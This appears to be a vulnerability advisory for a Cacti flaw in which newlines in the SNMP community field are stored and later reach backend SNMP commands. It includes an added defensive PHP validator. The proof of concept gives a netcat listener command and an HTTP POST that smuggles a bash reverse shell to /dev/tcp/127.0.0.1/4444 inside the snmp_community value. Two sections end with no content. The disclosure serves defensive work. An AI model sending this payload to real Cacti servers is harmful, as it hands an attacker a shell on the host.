Summary
An input-validation flaw exists in the SNMP device configuration functionality.
An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations.
In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process.
Details
Cacti allows authenticated users to configure devices via `host.php?action=save`.
One of the fields, `snmp_community`, is intended to store the SNMP community string used for polling.
Input Handling
In host.php (device creation/editing), the SNMP community string is retrieved using:
```php
get_nfilter_request_var('snmp_community');
```
This function performs no stripping of newline characters and does not validate shell metacharacters or command-separator characters.
The value is passed into `api_device_save()`:
```php
$save['snmp_community'] = form_input_validate(
    $snmp_community,
    'snmp_community',
    '',    // empty regex = no filtering
    true,
    3
);
```
Key points:
- The sanitization regex is intentionally left empty (`''`), disabling validation.
- Newline characters remain unmodified.
- No escaping, truncation, or encoding is performed.
- The input is subsequently committed to the database as part of the `host` table.
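As an added example (not Cacti's own code), the following standalone PHP shows the kind of allow-list check that would reject the control-character values described above, plus an audit helper a defender can run over `snmp_community` values already stored in the `host` table; the function names, the 64-byte limit and the sample values are assumptions made for this illustration.

```php
<?php
// Added illustration, not part of Cacti. SNMP community strings are octet
// strings at the protocol level, but real deployments use printable ASCII;
// restricting to that (and to a sane length) keeps newlines and other
// control characters out of the host table and out of any backend SNMP
// invocation that is built from the stored value.

/**
 * Return true only if $value is non-empty printable ASCII with no control
 * characters (0x00-0x1F, 0x7F) and at most $maxLen bytes.
 */
function snmp_community_is_safe(string $value, int $maxLen = 64): bool
{
    if ($value === '' || strlen($value) > $maxLen) {
        return false;
    }
    // Whole-string match against the allow-list. \A and \z are used instead
    // of ^ and $ because $ would still accept a value ending in "\n".
    return preg_match('/\A[\x20-\x7E]+\z/', $value) === 1;
}

/**
 * Audit helper for existing rows: given id => snmp_community pairs (as read
 * from the host table), return the ids whose value would fail the check.
 * This doubles as a detection for values that were injected before the
 * input check existed.
 */
function find_unsafe_communities(array $rows): array
{
    $hits = [];
    foreach ($rows as $id => $community) {
        if (!snmp_community_is_safe($community)) {
            $hits[] = $id;
        }
    }
    return $hits;
}

// Constructed sample rows; id 3 has the shape of a newline-separated value
// (a real community followed by extra lines), id 4 ends in a bare newline.
$sample = [
    1 => 'public',
    2 => 'r0-m0n1t0r',
    3 => "public\nsecond-token\n#",
    4 => "public\n",
];
foreach ($sample as $id => $community) {
    printf("host %d: %s\n", $id, snmp_community_is_safe($community) ? 'ok' : 'REJECT');
}
print_r(find_unsafe_communities($sample));
```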
### Database Result
A crafted multi-line community string (for demonstration):
will be stored exactly as provided:
POC
1. Start a listener: `nc -lvnp 4444`
2. Send a similar POST request to create a new device:
```http
POST /cacti/host.php?header=false HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, br

__csrf_magic=sid%3A3a2d0b3cddfb5912184b4b5130bb698650fc35d2%2C1764272981&description=aaa&hostname=127.0.0.1&location=&poller_id=1&site_id=1&host_template_id=0&device_threads=1&snmp_version=2&snmp_community=public%0abash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f127.0.0.1%2f4444%200%3e%261'%0a%23&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=0&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1&notes=&external_id=&id=3&save_component_host=1&graph_template_id=297&snmp_query_id=2&reindex_method=1&action=save
```
3. Trigger it by going to Management > Devices > aaa.
SNMP logs:
Impact
Arbitrary commands may execute with the privileges of the Cacti process.
Under typical deployments, this can result in:
- Unauthorized modification of monitoring data
- Execution of system-level commands
- Unauthorized file writes
- Potential full compromise of the Cacti server